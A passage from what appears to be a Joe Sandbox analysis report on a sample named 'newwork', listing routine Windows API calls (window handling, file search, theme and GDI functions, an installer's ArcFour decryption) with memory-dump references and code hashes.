                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 1177325624-0
                                                                                • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 0048397A
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$IconicLong
                                                                                • String ID:
                                                                                • API String ID: 2754861897-0
                                                                                • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004241E4
                                                                                • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                  • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021A25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveFocusIconicShow
                                                                                • String ID:
                                                                                • API String ID: 649377781-0
                                                                                • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00417D0F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID:
                                                                                • API String ID: 568898626-0
                                                                                • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureIconic
                                                                                • String ID:
                                                                                • API String ID: 2277910766-0
                                                                                • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 0042419B
                                                                                  • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                  • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                  • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                  • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                • String ID:
                                                                                • API String ID: 2671590913-0
                                                                                • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • String ID:
                                                                                • API String ID: 2153018856-0
                                                                                • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • String ID:
                                                                                • API String ID: 2153018856-0
                                                                                • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2576788152.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000001.00000002.2576760974.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2576812745.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2576788152.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000001.00000002.2576760974.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2576812745.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                • API String ID: 1968650500-2910565190
                                                                                • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0041CA40
                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
